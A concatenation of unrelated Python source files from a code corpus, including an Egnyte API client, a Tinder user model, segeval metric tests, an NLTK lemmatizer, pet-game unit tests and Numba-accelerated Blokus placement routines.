def get(self, id):
"""Get a Link object by it's id"""
return Link(self._client, id=id)
def list(self, path=None, username=None, created_before=None, created_after=None, type=None, accessibility=None,
offset=None, count=None):
"""
Search links that match following optional conditions:
* path: List links to this file or folder (Full absolute path of destination file or folder)
* username: List links created by this user (Any username from your Egnyte account)
* created_before: List links created before this date (datetime.date, or string in YYYY-MM-DD format)
* created_after: List links created after this date (datetime.date, or string in YYYY-MM-DD format)
* type: Links of selected type will be shown ('File' or 'Folder')
* accessibility: Links of selected accessibility will be shown ('Anyone', 'Password', 'Domain', or 'Recipients')
* offset: Start at this link, where offset=0 means start with first link.
* count: Send this number of links. If not specified, all links will be sent.
Returns a list of Link objects, with additional total_count and offset attributes.
"""
url = self._client.get_url(self._url_template)
params = base.filter_none_values(dict(path=path, username=username, created_before=base.date_format(created_before),
created_after=base.date_format(created_after), type=type, accessibility=accessibility,
offset=offset, count=count))
json = exc.default.check_json_response(self._client.GET(url, params=params))
return base.ResultList((Link(self._client, id=id) for id in json.get('ids', ())), json['total_count'], json['offset'])
class Users(base.HasClient):
"""User management API"""
_url_template = "pubapi/v2/users"
def list(self, email=None, externalId=None, userName=None, startIndex=None, count=None):
"""
Search users. Optional search parameters are 'email', 'externalId' and 'userName'.
startIndex (starts with 1) and count may be used for pagination
Returns a list of User objects, with additional total_count and offset attributes.
"""
url = self._client.get_url(self._url_template)
filters = base.filter_none_values(dict(email=email, externalId=externalId, userName=userName))
params = base.filter_none_values(dict(startIndex=startIndex, count=count))
params['filter'] = [u'%s eq "%s"' % (k, v) for (k, v) in filters.items()]
json = exc.default.check_json_response(self._client.GET(url, params=params))
return base.ResultList((User(self._client, **d) for d in json.get('resources', ())), json['totalResults'], json['startIndex'] - 1)
def get(self, id):
"""Get a User object by id. Does not check if User exists."""
return User(self._client, id=id)
def by_email(self, email):
"""Get a User object by email. Returns None if user does not exist"""
try:
return self.list(email=email)[0]
except LookupError:
pass
def by_username(self, userName):
"""Get a User object by username. Returns None if user does not exist"""
try:
return self.list(userName=userName)[0]
except LookupError:
pass
def create(self, userName, externalId, email, familyName, givenName, active=True, sendInvite=True, authType='egnyte',
userType='power', role=None, idpUserId=None, userPrincipalName=None):
"""
Create a new user account. Parameters:
* userName: The Egnyte username for the user. Username must start with a letter or digit. Special characters are not supported (with the exception of periods, hyphens, and underscores).
* externalId: This is an immutable unique identifier provided by the API consumer. Any plain text (e.g. S-1-5-21-3623811015-3361044348-30300820-1013)
* email: The email address of the user. Any valid email address (e.g. <EMAIL>)
* familyName: The last name of the user. Any plain text (e.g. John)
* givenName: The first name of the user. Any plain text (e.g. Smith)
* active: Whether the user is active or inactive. True or False
* sendInvite: If set to true when creating a user, an invitation email will be sent (if the user is created in active state). True or False
* authType: The authentication type for the user. 'ad' (AD), 'sso' (SAML SSO), 'egnyte' (Internal Egnyte)
* userType: The type of the user. 'admin' (Administrator), 'power' (Power User), 'standard' (Standard User)
* role: The role assigned to the user. Only applicable for Power Users. Default or custom role name
* idpUserId: Only required if the user is SSO authenticated and not using default user mapping. Do not specify if user is not SSO authenticated. This is the way the user is identified within the SAML Response from an SSO Identity Provider, i.e. the SAML Subject (e.g. jsmith)
* userPrincipalName: Do not specify if user is not AD authenticated. Used to bind child authentication policies to a user when using Active Directory authentication in a multi-domain setup (e.g. <EMAIL>)
Returns created User object.
"""
url = self._client.get_url(self._url_template)
data = base.filter_none_values(dict(userName=userName, externalId=externalId, email=email,
name=dict(familyName=familyName, givenName=givenName), active=active, sendInvite=sendInvite, authType=authType,
userType=userType, role=role, idpUserId=idpUserId, userPrincipalName=userPrincipalName))
json = exc.created.check_json_response(self._client.POST(url, data))
return User(self._client, **json)
class PermissionSet(object):
"""Wrapper for a permission set"""
def __init__(self, json):
self._users = json.get('users', ())
self._groups = json.get('groups', ())
self._unpack()
def _unpack(self):
self.user_to_permission = {}
self.group_to_permission = {}
self.permission_to_owner = collections.defaultdict(lambda: dict(users=set(), groups=set()))
for d in self._users:
self.user_to_permission[d['subject']] = d['permission']
self.permission_to_owner[d['permission']]['users'].add(d['subject'])
for d in self._groups:
self.group_to_permission[d['subject']] = d['permission']
self.permission_to_owner[d['permission']]['groups'].add(d['subject'])
class Notes(base.HasClient):
"""
Notes management API
"""
_url_template = "pubapi/v1/notes"
def create(self, path, message):
"""
Create a new note.
Parameters:
* path - path to the file the note is about
* message - contents of the note
Returns the created Note object.
"""
url = self._client.get_url(self._url_template)
data = dict(path=path, body=message)
json = exc.created.check_json_response(self._client.POST(url, data))
return Note(self._client, **json)
def list(self, file=None, folder=None, start_time=None, end_time=None):
"""
List existing notes.
Optional filtering parameters:
* start_time: Get notes created after start_time (datetime.date or string in 'YYYY-MM-DD' format)
* file: Get only notes attached to a specific file (path).
* folder: Get only notes attached to files in a specific folder (path).
* end_time: Get notes created before end_time (datetime.date or string in 'YYYY-MM-DD' format)
Returns list of Note objects, with additional attributes total_count and offset.
"""
url = self._client.get_url(self._url_template)
params = base.filter_none_values(dict(file=file, folder=folder, start_time=base.date_format(start_time),
end_time=base.date_format(end_time)))
json = exc.default.check_json_response(self._client.GET(url, params=params))
return base.ResultList((Note(self._client, **d) for d in json.pop('notes', ())), json['total_results'], json['offset'])
class Groups(base.HasClient):
"""
Group Management API
"""
_url_template = "pubapi/v2/groups"
def list(self, displayName=None, startIndex=None, count=None):
"""
List existing groups.
Optional filtering parameters:
* displayName: Filter by name of the group. This may contain '*' wildcards at beginning for prefix search or both at beginning and end for contains search.
Returns list of Group objects, with additional attributes total_count and offset
"""
params = base.filter_none_values(dict(startIndex=startIndex, count=count))
if displayName:
if displayName.startswith('*'):
op = 'co' if displayName.endswith('*') else 'sw'
else:
op = 'eq'
params['filter'] = [u'displayName %s "%s"' % (op, displayName.strip('*'))]
url = self._client.get_url(self._url_template)
json = exc.default.check_json_response(self._client.GET(url, params=params))
return base.ResultList((Group(self._client, **d) for d in json.pop('resources', ())), json['totalResults'], json['startIndex'] - 1)
def create(self, displayName, members=None):
"""
Create a new Group. Parameters:
* displayName: Name of the group (string). Required
* members: List of members to be added to the new group (user ids or User objects). Optional.
Returns created Group object.
"""
url = self._client.get_url(self._url_template)
data = dict(displayName=displayName)
if members is not None:
data['members'] = [dict(value=x.id if isinstance(x, User) else x) for x in members]
json = exc.created.check_json_response(self._client.POST(url, data))
return Group(self._client, **json)
def get(self, id):
"""Get a Group object by id. Does not check if Group exists."""
return Group(self._client, id=id)
def by_displayName(self, displayName):
"""Get a Group object by displayName. Returns None if Group does not exist"""
try:
return self.list(displayName=displayName)[0]
except LookupError:
pass
class SearchMatch(base.HasClient):
"""
Single match from search results.
Attributes for a file match:
* name The name of the file.
* path The path to the file in Egnyte.
* type The MIME type of the file.
* size The size of the file in bytes.
* snippet A plain text snippet of the text containing the matched content.
* snippet_html An HTML formatted snippet of the text containing the matched content.
* entry_id A GUID for that particular instance of a file.
* last_modified The ISO-8601 formatted timestamp representing the last modified date of the file.
* uploaded_by The formatted name of the user who uploaded the file.
* uploaded_by_username The username of the user who uploaded the file.
* num_versions The number of versions of the file available.
* is_folder A boolean value stating if the object is a file or folder. Please note that, currently, this API only returns file objects.
"""
def file(self):
"""Get File object that correspons to this search match, or None if found resource is not a File"""
if not self.is_folder:
return File(self._client, name=self.name, path=self.path, is_folder=self.is_folder, num_versions=self.num_versions,
entry_id=self.entry_id, uploaded_by=self.uploaded_by, size=self.size, last_modified=self.last_modified)
class Search(base.HasClient):
"""Search API"""
_url_template = "pubapi/v1/search"
def files(self, query, offset=None, count=None, folder=None, modified_after=None, modified_before=None):
"""
Search for files.
Parameters:
* query The search string you want to find. * is supported as a postfix wildcard, AND and OR as bool operations and double quotes for phrase search.
* offset The 0-based index of the initial record being requested (Integer >= 0).
* count The number of entries per page (min 1, max 100)
* folder Limit the result set to only items contained in the specified folder.
* modified_before Limit to results before the specified ISO-8601 timestamp (datetime.date object or string).
* modified_after Limit to results after the specified ISO-8601 timestamp (datetime.date object or string).
Returns list of SearchMatch objects, with additional attributes total_count and offset.
"""
url = self._client.get_url(self._url_template)
params = base.filter_none_values(dict(
query=query,
offset=offset,
count=count,
folder=folder,
modified_after=base.date_format(modified_after),
modified_before=base.date_format(modified_before))
)
json = exc.default.check_json_response(self._client.GET(url, params=params))
return base.ResultList((SearchMatch(self._client, **d) for d in json.get('results', ())), json['total_count'], json['offset'])
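# Hedged usage sketch (illustrative only, not part of this module): these resources are
# normally reached through an authenticated client object; the EgnyteClient constructor,
# domain, token, and paths below are assumptions for illustration.
#
#   import egnyte
#   client = egnyte.EgnyteClient({"domain": "example.egnyte.com", "access_token": "<token>"})
#   folder = client.folder("/Shared/example").create(ignore_if_exists=True)
#   f = client.file("/Shared/example/report.txt")
#   f.upload(b"hello world")
#   print(f.get_notes())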
|
StarcoderdataPython
|
3394084
|
<filename>pynder/models/user.py
import dateutil.parser
from datetime import date
from .. import constants
from six import text_type
from .message import Message
class User(object):
def __init__(self, data, session):
self._session = session
self._data = data
self.id = data['_id']
SIMPLE_FIELDS = ("name", "bio", "birth_date", "ping_time")
for f in SIMPLE_FIELDS:
setattr(self, f, data[f])
self.photos_obj = [p for p in data['photos']]
self.birth_date = dateutil.parser.parse(self.birth_date)
self.schools = []
self.jobs = []
try:
self.schools.extend([school["name"] for school in data['schools']])
self.jobs.extend(["%s @ %s" % (job["title"]["name"], job["company"][
"name"]) for job in data['jobs'] if 'title' in job and 'company' in job])
self.jobs.extend(["%s" % (job["company"]["name"],) for job in data[
'jobs'] if 'title' not in job and 'company' in job])
self.jobs.extend(["%s" % (job["title"]["name"],) for job in data[
'jobs'] if 'title' in job and 'company' not in job])
except ValueError:
pass
@property
def instagram_username(self):
if self._data.get("instagram", False):
return self._data['instagram']['username']
@property
def instagram_photos(self):
if self._data.get("instagram", False):
return [p for p in self._data['instagram']['photos']]
@property
def gender(self):
return constants.GENDER_MAP[int(self._data['gender'])]
@property
def common_interests(self):
return [p for p in self._data['common_interests']]
@property
def common_connections(self):
return [p for p in self._data['common_connections']]
@property
def thumbnails(self):
return self.get_photos(width="84")
@property
def photos(self):
return self.get_photos()
@property
def distance_km(self):
if self._data.get("distance_mi", False) or self._data.get("distance_km", False):
return self._data.get('distance_km', self._data['distance_mi'] * 1.60934)
else:
return 0
@property
def age(self):
today = date.today()
return (today.year - self.birth_date.year -
((today.month, today.day) <
(self.birth_date.month, self.birth_date.day)))
def __unicode__(self):
return u"{n} ({a})".format(n=self.name, a=self.age)
def __str__(self):
return text_type(self).encode('utf-8')
def __repr__(self):
return repr(self.name)
def report(self, cause):
return self._session._api.report(self.id, cause)
def get_photos(self, width=None):
photos_list = []
for photo in self.photos_obj:
if width is None:
photos_list.append(photo.get("url"))
else:
sizes = ["84", "172", "320", "640"]
if width not in sizes:
print("Only support these widths: %s" % sizes)
return None
for p in photo.get("processedFiles", []):
if p.get("width", 0) == int(width):
photos_list.append(p.get("url", None))
return photos_list
class Hopeful(User):
def like(self):
return self._session._api.like(self.id)['match']
def superlike(self):
return self._session._api.superlike(self.id)['match']
def dislike(self):
return self._session._api.dislike(self.id)
class Match(object):
def __init__(self, match, _session):
self._session = _session
self.id = match["_id"]
self.user, self.messages = None, []
if 'person' in match:
user_data = _session._api.user_info(
match['person']['_id'])['results']
user_data['_id'] = match['person']['_id']
self.user = User(user_data, _session)
self.messages = [Message(m, user=self.user)
for m in match['messages']]
def message(self, body):
return self._session._api.message(self.id, body)['_id']
def delete(self):
return self._session._api._request('DELETE', '/user/matches/' + self.id)
def __repr__(self):
return "<Unnamed match>" if self.user is None else repr(self.user)
|
StarcoderdataPython
|
1623086
|
<reponame>acolley/protoactor-python
import asyncio
from datetime import timedelta
from threading import Thread
class AsyncTimer(Thread):
def __init__(self, interval: timedelta, function, args=None, kwargs=None):
super().__init__()
self.interval = interval
self.function = function
self.args = args if args is not None else []
self.kwargs = kwargs if kwargs is not None else {}
self.loop = None
self._task = None
self._cancelled = False
def run(self):
self.loop = asyncio.new_event_loop()
loop = self.loop
asyncio.set_event_loop(loop)
try:
self._task = asyncio.ensure_future(self._job())
loop.run_until_complete(self._task)
finally:
loop.close()
def cancel(self):
if self.loop is not None:
self._cancelled = True
async def _job(self):
await asyncio.sleep(self.interval.total_seconds())
if not self._cancelled:
await self.function(*self.args, **self.kwargs)
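# Hedged usage sketch (illustrative only, not part of the original file): the timer runs a
# coroutine once after the given delay on its own event-loop thread; the callback below is
# a made-up example. Calling cancel() before the interval elapses skips the call.
async def _say_hello(name):
    print("hello,", name)
demo_timer = AsyncTimer(timedelta(seconds=1), _say_hello, args=["world"])
demo_timer.start()
demo_timer.join()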
|
StarcoderdataPython
|
4801767
|
import os
# In the template we named it `gitignore` so it does not interfere with
# the templates `.gitignore`.
# Rename gitignore -> .gitignore
os.rename("gitignore", ".gitignore")
|
StarcoderdataPython
|
45834
|
<filename>segeval/ml/test.py
'''
Tests the machine learning (ML) statistics functions, and ml package.
.. moduleauthor:: <NAME> <<EMAIL>>
'''
from __future__ import absolute_import
import unittest
from decimal import Decimal
from segeval.ml import (
__precision__, precision, __recall__, recall, __fmeasure__,
fmeasure, ConfusionMatrix as cm, Average)
from segeval.util import SegmentationMetricError
class TestConfusionMatrix(unittest.TestCase):
'''
Confusion matrix tests.
'''
def test_matrix_set_add(self):
'''
Test matrix.
'''
matrix = cm()
matrix['p']['p'] += 2
matrix['p']['n'] = 3
self.assertEqual(matrix['p']['p'], 2)
self.assertEqual(matrix['p']['n'], 3)
self.assertEqual(matrix['p']['f'], 0)
self.assertEqual(matrix['a']['b'], 0)
def test_setitem(self):
'''
Ensure that __setitem__ raises an AttributeError
'''
exception = False
matrix = cm()
try:
matrix['a'] = 0
except AttributeError:
exception = True
self.assertTrue(exception, 'AttributeError not raised')
def test_matrix_classes(self):
'''
Test matrix.
'''
matrix = cm()
matrix['p']['p'] += 2
matrix['p']['n'] = 3
self.assertEqual(matrix['p']['p'], 2)
self.assertEqual(matrix['p']['n'], 3)
self.assertEqual(matrix['p']['f'], 0)
self.assertEqual(matrix['a']['b'], 0)
self.assertEqual(matrix.classes(), set(['p', 'n', 'a', 'b', 'f']))
class TestML(unittest.TestCase):
'''
Machine-learning metric tests.
'''
def test_precision(self):
'''
Test precision.
'''
matrix = cm()
matrix['p']['p'] += 1
matrix['p']['f'] += 1
self.assertEqual(__precision__(matrix, 'p'), Decimal('0.5'))
self.assertEqual(__precision__(matrix, 'f'), Decimal('0'))
self.assertEqual(
precision(matrix, version=Average.micro), Decimal('0.5'))
self.assertEqual(
precision(matrix, version=Average.macro), Decimal('0.25'))
matrix = cm()
matrix['p']['p'] += 1
matrix['p']['f'] += 3
matrix['f']['p'] += 1
self.assertEqual(
precision(matrix, version=Average.micro), Decimal('0.2'))
self.assertEqual(
precision(matrix, version=Average.macro), Decimal('0.125'))
self.assertEqual(__precision__(matrix, 'p'), Decimal('0.25'))
self.assertEqual(__precision__(matrix, 'f'), Decimal('0'))
matrix = cm()
matrix['p']['p'] += 5
matrix['p']['f'] += 2
matrix['f']['p'] += 1
matrix['f']['f'] += 2
self.assertEqual(
precision(matrix, version=Average.micro), Decimal('0.7'))
self.assertAlmostEqual(precision(matrix, version=Average.macro),
Decimal('0.69047'), 4)
self.assertAlmostEqual(__precision__(matrix, 'p'),
Decimal('0.71428'), 4)
self.assertAlmostEqual(__precision__(matrix, 'f'),
Decimal('0.66666'), 4)
matrix = cm()
matrix['p']['f'] += 2
self.assertEqual(precision(matrix), Decimal('0'))
self.assertEqual(__precision__(matrix, 'p'), Decimal('0'))
self.assertEqual(__precision__(matrix, 'f'), Decimal('0'))
matrix = cm()
matrix['p']['p'] += 2
self.assertEqual(precision(matrix), Decimal('1'))
self.assertEqual(__precision__(matrix, 'p'), Decimal('1'))
self.assertEqual(__precision__(matrix, 'f'), Decimal('0'))
matrix = cm()
self.assertEqual(precision(matrix), Decimal('0'))
self.assertEqual(__precision__(matrix, 'p'), Decimal('0'))
self.assertEqual(__precision__(matrix, 'f'), Decimal('0'))
def test_recall(self):
'''
Test recall.
'''
matrix = cm()
matrix['p']['p'] += 1
matrix['p']['f'] += 1
self.assertEqual(__recall__(matrix, 'p'), Decimal('1.0'))
self.assertEqual(__recall__(matrix, 'f'), Decimal('0'))
self.assertEqual(recall(matrix, version=Average.micro), Decimal('0.5'))
self.assertEqual(recall(matrix, version=Average.macro), Decimal('0.5'))
matrix = cm()
matrix['p']['p'] += 1
matrix['p']['f'] += 3
matrix['f']['p'] += 1
self.assertEqual(recall(matrix, version=Average.micro), Decimal('0.2'))
self.assertEqual(
recall(matrix, version=Average.macro), Decimal('0.25'))
self.assertEqual(__recall__(matrix, 'p'), Decimal('0.5'))
self.assertEqual(__recall__(matrix, 'f'), Decimal('0'))
matrix = cm()
matrix['p']['p'] += 5
matrix['p']['f'] += 2
matrix['f']['p'] += 1
matrix['f']['f'] += 2
self.assertEqual(recall(matrix, version=Average.micro), Decimal('0.7'))
self.assertAlmostEqual(recall(matrix, version=Average.macro),
Decimal('0.66666'), 4)
self.assertAlmostEqual(__recall__(matrix, 'p'),
Decimal('0.83333'), 4)
self.assertAlmostEqual(__recall__(matrix, 'f'),
Decimal('0.5'), 4)
matrix = cm()
matrix['p']['f'] += 2
self.assertEqual(recall(matrix), Decimal('0'))
self.assertEqual(__recall__(matrix, 'p'), Decimal('0'))
self.assertEqual(__recall__(matrix, 'f'), Decimal('0'))
matrix = cm()
matrix['p']['p'] += 2
self.assertEqual(recall(matrix), Decimal('1'))
self.assertEqual(__recall__(matrix, 'p'), Decimal('1'))
self.assertEqual(__recall__(matrix, 'f'), Decimal('0'))
matrix = cm()
self.assertEqual(recall(matrix), Decimal('0'))
self.assertEqual(__recall__(matrix, 'p'), Decimal('0'))
self.assertEqual(__recall__(matrix, 'f'), Decimal('0'))
def test_fmeasure(self):
'''
Test FMeasure.
'''
matrix = cm()
matrix['p']['p'] += 1
matrix['p']['f'] += 1
self.assertAlmostEqual(
__fmeasure__(matrix, 'p'), Decimal('0.66666'), 4)
self.assertEqual(__fmeasure__(matrix, 'f'), Decimal('0'))
self.assertAlmostEqual(fmeasure(matrix, version=Average.micro),
Decimal('0.66666'), 4)
self.assertAlmostEqual(fmeasure(matrix, version=Average.macro),
Decimal('0.33333'), 4)
self.assertAlmostEqual(fmeasure(matrix, classification='p'),
Decimal('0.66666'), 4)
matrix = cm()
matrix['p']['p'] += 1
matrix['p']['f'] += 3
matrix['f']['p'] += 1
self.assertAlmostEqual(fmeasure(matrix, version=Average.micro),
Decimal('0.33333'), 4)
self.assertAlmostEqual(fmeasure(matrix, version=Average.macro),
Decimal('0.16666'), 4)
self.assertAlmostEqual(__fmeasure__(matrix, 'p'),
Decimal('0.33333'), 4)
self.assertAlmostEqual(fmeasure(matrix, classification='p'),
Decimal('0.33333'), 4)
self.assertEqual(__fmeasure__(matrix, 'f'), Decimal('0'))
matrix = cm()
matrix['p']['p'] += 5
matrix['p']['f'] += 2
matrix['f']['p'] += 1
matrix['f']['f'] += 2
self.assertAlmostEqual(fmeasure(matrix, version=Average.micro),
Decimal('0.68421'), 4)
self.assertAlmostEqual(fmeasure(matrix, version=Average.macro),
Decimal('0.67032'), 4)
self.assertAlmostEqual(__fmeasure__(matrix, 'p'),
Decimal('0.76923'), 4)
self.assertAlmostEqual(__fmeasure__(matrix, 'f'),
Decimal('0.57142'), 4)
matrix = cm()
matrix['p']['f'] += 2
self.assertEqual(fmeasure(matrix), Decimal('0'))
self.assertEqual(__fmeasure__(matrix, 'p'), Decimal('0'))
self.assertEqual(__fmeasure__(matrix, 'f'), Decimal('0'))
matrix = cm()
matrix['p']['p'] += 2
self.assertEqual(fmeasure(matrix), Decimal('1'))
self.assertEqual(__fmeasure__(matrix, 'p'), Decimal('1'))
self.assertEqual(__fmeasure__(matrix, 'f'), Decimal('0'))
matrix = cm()
self.assertEqual(fmeasure(matrix), Decimal('0'))
self.assertEqual(__fmeasure__(matrix, 'p'), Decimal('0'))
self.assertEqual(__fmeasure__(matrix, 'f'), Decimal('0'))
def test_exception_on_incorrect_average(self):
'''
Test exception on incorrect average.
'''
matrix = cm()
matrix['p']['p'] += 1
matrix['p']['f'] += 1
self.assertRaises(
SegmentationMetricError, fmeasure, matrix, version='incorrect')
|
StarcoderdataPython
|
84180
|
import warnings
warnings.warn("pandas.types.common is deprecated and will be "
"removed in a future version, import "
"from pandas.api.types",
DeprecationWarning, stacklevel=3)
from pandas.core.dtypes.common import * # noqa
|
StarcoderdataPython
|
123707
|
<filename>src/week_5/features/process_text/lemmatization.py
from nltk import pos_tag, word_tokenize
from nltk.corpus import wordnet
from nltk.stem import WordNetLemmatizer
def is_noun(tag):
return tag in ['NN', 'NNS', 'NNP', 'NNPS']
def is_verb(tag):
return tag in ['VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ']
def is_adverb(tag):
return tag in ['RB', 'RBR', 'RBS']
def is_adjective(tag):
return tag in ['JJ', 'JJR', 'JJS']
def penn_to_wn(tag):
if is_adjective(tag):
return wordnet.ADJ
elif is_noun(tag):
return wordnet.NOUN
elif is_adverb(tag):
return wordnet.ADV
elif is_verb(tag):
return wordnet.VERB
return None
def lemma_tokens(tokens, wnl):
lemmas = []
for item in tokens:
pos = pos_tag([item])[0][1]
ptw = penn_to_wn(pos)
if ptw is None:
lemmas.append(wnl.lemmatize(item))
else:
lemmas.append(wnl.lemmatize(item, ptw))
return lemmas
def tokenize(text):
wnl = WordNetLemmatizer()
tokens = word_tokenize(text)
lemmas = lemma_tokens(tokens, wnl)
return lemmas
def lemmatization(dataset):
dataset_lemma = list()
for doc in dataset:
doc_lemmas = tokenize(doc)
dataset_lemma.append(' '.join(doc_lemmas))
return dataset_lemma
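# Hedged usage sketch (illustrative only): lemmatization() takes an iterable of raw text
# documents and returns them with each token lemmatized according to its POS tag. It
# assumes the NLTK 'punkt', 'averaged_perceptron_tagger' and 'wordnet' corpora are already
# downloaded.
example_docs = ["The striped bats were hanging on their feet"]
print(lemmatization(example_docs))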
|
StarcoderdataPython
|
1707796
|
<reponame>tarnover/tencentcloud-cli<gh_stars>0
version = "2018-05-22"
|
StarcoderdataPython
|
173007
|
import unittest
from pysapets.ox import Ox
from pysapets.animal import Animal
import pysapets.constants as constants
from unittest.mock import patch
from io import StringIO
from copy import deepcopy
class OxTest(unittest.TestCase):
def setUp(self):
self.ox = Ox()
self.friends = [self.ox, Animal(2, 2), Animal(2, 2), Animal(2, 2), Animal(2, 2)]
# test that get_type returns the correct type
def test_get_type(self):
self.assertEqual(self.ox.get_type(), constants.OX)
# test that ox starts with base health of 4
def test_get_health(self):
self.assertEqual(self.ox.get_health(), 4)
# test that ox starts with base attack of 1
def test_get_attack(self):
self.assertEqual(self.ox.get_attack(), 1)
# test that initializing ox with additional health increases health
def test_init_add_health(self):
newOx = Ox(addHealth = 3)
self.assertEqual(newOx.get_health(), 4 + 3)
# test that initializing an ox with additional attack increases attack
def test_init_add_attack(self):
newOx = Ox(addAttack = 3)
self.assertEqual(newOx.get_attack(), 1 + 3)
# test that initializing ox with additional health and attack increases health and attack
def test_init_add_health_attack(self):
newOx = Ox(addHealth = 3, addAttack = 3)
self.assertEqual(newOx.get_health(), 4 + 3)
self.assertEqual(newOx.get_attack(), 1 + 3)
# test that ox ability has correct trigger
def test_get_ability_trigger(self):
self.assertEqual(self.ox.get_ability_trigger(), constants.FAINT)
# test that ox ability has correct triggeredBy
def test_get_ability_triggeredBy(self):
self.assertEqual(self.ox.get_ability_triggeredBy(), constants.FRIEND_AHEAD)
# TODO add relevant tests for ox ability
def test_run_ability(self):
pass
def test_run_ability_level_1(self):
pass
def test_run_ability_level_2(self):
pass
def test_run_ability_level_3(self):
pass
|
StarcoderdataPython
|
3314088
|
'''
Author: <NAME>
Date: 3/15/19
Summary:
- Contains computation methods that board.py uses to
manage valid move seeks and piece placement.
- Methods use Numba with jit decorator that precompiles
types and makes runtime faster than normal python.
'''
from numba import jit
import numpy as np
import math
# def dummy_jit(*args, **kwargs):
# def dumdum(f):
# return f
# return dumdum
#
# jit = dummy_jit
#### METHODS FOR check_shifted() ####
@jit("UniTuple(int64, 2)(UniTuple(int64, 2), UniTuple(int64, 2), double)", nopython=True) # "int(int64, ...)"
def rotate_by_deg(index, offset_point, angle):
''' Rotates each point on piece around the index by the given angle
'''
ox, oy = index
px, py = offset_point
new_x = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)
new_y = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)
return int(round(new_x, 1)), int(round(new_y, 1))
@jit("UniTuple(int64, 2)(UniTuple(int64, 2), int64, int64)", nopython=True)
def flip_piece_x(index, x, y):
''' Takes the difference between index x and point x, then applies reverse
difference to the index point. y stays the same
'''
return index[0] - (index[0] - x) * -1, y
@jit("UniTuple(int64, 2)(UniTuple(int64, 2), int64, int64)", nopython=True)
def flip_piece_y(index, x, y):
''' Takes the difference between index y and point y, then applies reverse
difference to the index point. x stays the same
'''
return x, index[1] + (y - index[1]) * -1
@jit("UniTuple(int64, 2)(UniTuple(int64, 2), int64, int64, unicode_type)", nopython=True)
def rotate_piece(index, x_offset, y_offset, piece_orientation):
''' Description: Orients piece around the index point
Parameters:
index: int tuple that specifies the index coordinate on the board (the coord the piece will rotate around)
offset: int tuple that specifies the offset from the index coord for the current cell
piece_orientation: string specifying what new orientation you want the point at
Returns:
2 ints x and y that are the new rotated piece coords
'''
piece_orientation = piece_orientation[:-1] # Takes out last character specifying the shift id (not needed in this method)
x_offset += index[0] # calculates the actual x coord on board
y_offset += index[1] # calculates the actual y coord on board
if piece_orientation == "north":
return rotate_by_deg(index, (x_offset, y_offset), math.radians(270))
elif piece_orientation == "northwest":
new_x, new_y = rotate_by_deg(index, (x_offset, y_offset), math.radians(270))
return flip_piece_x(index, new_x, new_y)
elif piece_orientation == "south":
return rotate_by_deg(index, (x_offset, y_offset), math.radians(90))
elif piece_orientation == "southeast":
new_x, new_y = rotate_by_deg(index, (x_offset, y_offset), math.radians(90))
return flip_piece_x(index, new_x, new_y)
elif piece_orientation == "west":
return rotate_by_deg(index, (x_offset, y_offset), math.radians(180))
elif piece_orientation == "southwest":
new_x, new_y = rotate_by_deg(index, (x_offset, y_offset), math.radians(180))
return flip_piece_y(index, new_x, new_y)
elif piece_orientation == "northeast":
new_x, new_y = rotate_by_deg(index, (x_offset, y_offset), math.radians(0))
return flip_piece_y(index, new_x, new_y)
else: # Default orientation (East)
return rotate_by_deg(index, (x_offset, y_offset), math.radians(0))
@jit("boolean(int64[:, ::1], int64, int64, int64)", nopython=True)
def is_valid_adjacents(board_contents, y, x, player_color):
''' Description: Invalid coord if left, right, bottom, or top cell is the same color as the current player.
Parameters:
board_contents: 20 by 20 numpy matrix representing the current state of the board
x: int x coord of the cell
y: int y coord of the cell
player_color: int representing current player color
Returns:
bool indicating whether the cell is a valid adjacent
'''
valid_adjacent = True
# Excludes top board edge from top cell check
if y != 0:
if board_contents[y - 1][x] == player_color:
valid_adjacent = False
# Excludes left board edge from left cell check
if x != 0:
if board_contents[y][x - 1] == player_color:
valid_adjacent = False
# Excludes bottom board edge from bottom cell check
if y != 19:
if board_contents[y + 1][x] == player_color:
valid_adjacent = False
# Excludes right board edge from right cell check
if x != 19:
if board_contents[y][x + 1] == player_color:
valid_adjacent = False
return valid_adjacent
@jit("boolean(int64[:, ::1], int64, int64, int64)", nopython=True)
def is_valid_cell(board_contents, x, y, player_color):
''' Description: If the cell x, y is empty, has no adjacent cells that are the same color,
and is not out of bounds of the 20x20 board, then the cell is valid
to put a part of a piece on it.
Parameters:
board_contents: 20 by 20 numpy matrix representing the current state of the board
x: int x coord of the cell
y: int y coord of the cell
player_color: int representing current player color
Returns:
bool indicating whether the cell is a valid cell
'''
# Out of bounds check
if x < 0 or x >= 20 or y < 0 or y >= 20:
return False
# Checks if cell is empty and a valid adjacent
if (board_contents[y][x] == 0 and is_valid_adjacents(board_contents, y, x, player_color)):
return True
else:
return False
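# Quick sanity sketch (illustrative) of the validity rules above, assuming an empty
# 20x20 board and player color 1:
#   board = np.zeros((20, 20), np.int64)
#   is_valid_cell(board, 0, 0, 1)   # True: empty cell with no same-color neighbors
#   board[0][1] = 1
#   is_valid_cell(board, 0, 0, 1)   # False: the cell to the right now holds color 1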
@jit("int64[:](int64[:, ::1], int64, UniTuple(int64, 2), unicode_type, int64[:, :, ::1])", nopython=True)
def check_shifted(board_contents, player_color, index, orientation, shifted_offsets):
    ''' Description: Shifts the entire piece N times, where N is how many cells the piece takes up.
All shifted offsets are checked for the current orientation to see whether
the shifted set of offsets is a valid move.
Parameters:
board_contents: 20 by 20 numpy matrix representing the current state of the board
        player_color: int representing current player color
index: int tuple that specifies the index coordinate on the board (the coord the piece will rotate around)
orientation: string specifying which orientation is being checked
shifted_offsets: list of a list of tuples where each element in the main list represents a different set of coords
for a shifted piece.
Returns:
        list of ints giving the ids of the shifted offset sets at which the piece
        can legally be placed
'''
shifted_ids = np.zeros(shifted_offsets.shape[0], np.int64)
num_items = 0
for shifted_id in range(shifted_offsets.shape[0]): # Shift piece N times where N is the number of cells in the piece
valid_placement = True
for offset_id in range(shifted_offsets.shape[1]):
offset = shifted_offsets[shifted_id, offset_id, :]
            if offset[0] == 0 and offset[1] == 0:  # No need to rotate this coord since it's the index and there is no offset
if not is_valid_cell(board_contents, index[0], index[1], player_color):
valid_placement = False
else:
new_piece = rotate_piece(index, offset[0], offset[1], orientation)
new_x = new_piece[0]
new_y = new_piece[1]
if not is_valid_cell(board_contents, new_x, new_y, player_color):
valid_placement = False
if valid_placement:
shifted_ids[num_items] = shifted_id
num_items += 1
return shifted_ids[:num_items]
#### METHODS FOR get_all_shifted_offsets() ####
